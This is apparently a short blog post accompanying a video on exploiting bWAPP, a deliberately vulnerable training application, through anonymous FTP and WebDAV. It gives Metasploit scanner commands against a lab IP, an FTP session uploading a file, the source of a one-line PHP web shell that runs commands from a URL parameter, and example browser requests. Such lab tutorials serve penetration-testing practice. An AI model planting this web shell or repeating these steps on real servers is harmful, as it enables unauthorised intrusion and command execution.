Tag Archives: ftp
Video

bWAPP: Abusing FTP and WebDav – Uploading Shell

The video shows how to exploit bWAPP through FTP and Webdav using metasploit framework. Here are the steps:

  • First run nmap and closely verify all the services
  • Run Metasploit Framework and exploit webdav and enable it
  • Run FTP and login and upload your backdoor
  • Access your backdoor through web browser and get reverse shell
# msfconsole
msf > search ftp_login
msf > auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set USERNAME anonymous
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set RHOSTS 192.168.25.139
msf auxiliary(ftp_login) > exploit

msf auxiliary(ftp_login) > search webdav_scanner
msf auxiliary(ftp_login) > use auxiliary/scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) > show options
msf auxiliary(webdav_scanner) > set RHOSTS 192.168.25.139
msf auxiliary(webdav_scanner) > set PATH /webdav/
msf auxiliary(webdav_scanner) > exploit

# ftp
ftp> o
(to) 192.168.25.139
Name (192.168.25.139:root): anonymous
Password:

ftp> ls
ftp> put backdoor.php

backdoor.php code:

<?php

print_r(($_GET['x'])?exec($_GET['x']):'');

>?

Address Bar:

192.168.25.139/webdav/backdoor.php?x=ls
192.168.25.139/webdav/backdoor.php?x=pwd

October 20, 2014 0 Comments , ,